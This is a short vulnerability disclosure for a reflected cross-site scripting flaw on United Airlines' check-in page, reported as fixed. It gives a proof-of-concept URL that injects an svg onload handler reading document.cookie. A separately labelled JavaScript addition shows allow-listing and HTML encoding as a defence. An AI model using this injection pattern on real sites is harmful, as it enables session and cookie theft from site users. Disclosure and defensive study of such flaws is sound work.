@xsuperbug
Created November 3, 2015 12:14
Name : United Airlines XSS Vulnerability
Vendor Homepage : http://www.united.com
Vulnerability Type : Cross-Site Scripting
Researcher : Evren Yalçın <evren [at] superbug [dot] co>
Example PoC is as follows :
http://www.united.com/travel/checkin/start.aspx?SID=&sessionKey=0DA191E8-342A-4FBE-A511-21C8702546D4&gLanguage=0&pat=False&code=PNR_NOT_FOUND_BY_ETICKET_LAST_NAME"><svg/onload=confirm(document.cookie)>//&opt=ET&1=&2=&3=123123123&4=
----
This issue was fixed by the vendor
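
Added example, not part of the original advisory and not the vendor's actual fix: one way to neutralise the reflected `code` value server-side with an allow-list plus HTML encoding. It assumes the value is echoed inside a double-quoted HTML attribute and that legitimate values are upper-case error identifiers; the template, the pattern and all function names are hypothetical.

```javascript
// ASSUMPTIONS (not stated in the advisory): `code` is echoed inside a
// double-quoted HTML attribute, and valid values look like error identifiers.

// The advisory's PoC URL, used here only as test input.
const POC_URL = 'http://www.united.com/travel/checkin/start.aspx?SID=&sessionKey=0DA191E8-342A-4FBE-A511-21C8702546D4&gLanguage=0&pat=False&code=PNR_NOT_FOUND_BY_ETICKET_LAST_NAME"><svg/onload=confirm(document.cookie)>//&opt=ET&1=&2=&3=123123123&4=';

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode every character that can close an attribute value or open a tag.
function encodeForHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical allow-list, inferred from the single value visible in the URL.
const CODE_PATTERN = /^[A-Z0-9_]{1,64}$/;

// Extract the decoded `code` query parameter.
function getCodeParam(url) {
  return new URL(url).searchParams.get('code') ?? '';
}

// "Before": raw concatenation into the attribute (hypothetical template).
function renderUnsafe(code) {
  return '<input type="hidden" name="code" value="' + code + '">';
}

// Encoding only: the value stays inside the attribute as inert text.
function renderEncoded(code) {
  return '<input type="hidden" name="code" value="' + encodeForHtml(code) + '">';
}

// "After": reject anything outside the allow-list, then encode anyway.
function renderSafe(code) {
  const checked = CODE_PATTERN.test(code) ? code : 'UNKNOWN_ERROR';
  return renderEncoded(checked);
}
```
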